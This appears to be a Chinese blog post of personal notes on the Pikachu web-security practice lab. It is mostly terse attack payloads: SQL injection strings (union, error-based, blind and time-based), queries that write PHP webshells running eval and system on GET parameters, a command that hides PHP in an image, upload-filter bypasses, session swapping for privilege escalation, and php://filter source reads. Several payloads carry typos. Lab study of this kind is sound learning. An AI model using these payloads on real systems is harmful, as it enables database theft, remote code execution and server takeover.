pikachu笔记1

暴力破解
    验证码绕过(on server):验证码不变化造成
    验证码绕过(on client):通过前端的JavaScript来进行了验证码的验证,在前端的验证码都是无效的。
    绕过token验证:options模块,使用Grep - Extract 
sql注入
    数字注入:select &1,&2 from 表名 where id=$id or 1=1
    字符型:select &1,&2 from 表名 where username='$name' or 1=1#'        ' or 1=1#双引号单引号一个一个试
    搜索型:select * from number where username like '%$name%' or 1=1 #%'    %' or 1=1 #
    xx型:username=('$name')        ') or 1=1 #照常拼接就行
    union select 信息获取order by 确定数量        union select database(),user(),version()#
    mysql数据库,自带表information_schema。schemate表:提供了当前mysql实例中所有数据库的信息。……    
    information_schema拿下数据库:kobe' union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#
    利用报错信息:
        updatexml(xml_document, XPathstring, new_value) :函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
            updatexml(1,concat(0x7e,version()),0)    0x7e是~的16进制,concat组合字符串。
            kobe' and updatexml(1, concat(0x7e,(select table_name from information_schema.tables wheretable_schema=' pikachu' limit 0,1)),0)#
            insert,update,delete
                mysql> insert into member(username, pN, ex ,phonenum, emai1 address)values("1' or updatexm1(1, concat.atabase(),0)or'',111111,1,2,3,4);
                ERROR 1105 (HY000):XPATH syntax'error: '~pikachu'
        extractvalue():函数也是MYSQL对XML文档数据进行查询的XPATH函数。
            extractvalue(0, concat(0x7e,version( ) ))#
        floor(): MYSQL中用来取整的函数。
            kobe ' and (select 2 from(select count(*) , concat(version( ),floor( rand(0)*2))x from information_schema.tables group by x)a)#
        http头header注入:改' ,看报错,确定是否涉及sql,然后改firefox' or updatexml(1,concat (ox7e,database()),0) or '
    盲注基于真假:kobe' and ascii( substr(database(),1,1))=112#推测第一个字符
     盲注基于时间:XXX' and sleep(5)#休息5秒
        kobe' and if( ( substr(database( ),1,1))='p',sleep(5),null)#
    获取操作系统权限:
        kobe' union select "<?php @eval($_GET[ 'test'])?>" ,2 into outfile "/var/w/htm1/1.php"#
        kobe' union select " <?php system($_GET[ ' cmd'] )?>" ,2 into gutfile, "/var/www/htm1/2.php"#
    暴力破解表名和列名称:
        kobe' and exists( select *from aa )进
        kobe' and exists(select id from users ) #
RCE:远程命令、代码执行
文件包含漏洞:本地、远程
文件上传
    客户端:前端直接改代码
    MIME:抓包改con...-type
    getimagesize()图片木马的制作:
        方法1:直接伪造头部GIF89A
        方法1.CMD: copy /b test.png + muma.php cccc.png
        方法2.使用GIMP(开源的图片修改软件),通过增加备注,写入执行命令
        利用文件包含漏洞读取
越权漏洞
    平行越权
    垂直越权 高级账户操作抓包,换低级账户登陆,抓的包换成低级账户sessions
ssrf
    php://filter/read=convert.base64-encode/resource=ssrf.php
    ?file=php://filter/read=convert.base64-encode/resource=../../../phpinfo.php
    https://blog.csdn.net/qq_45612828/article/details/126193765


 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值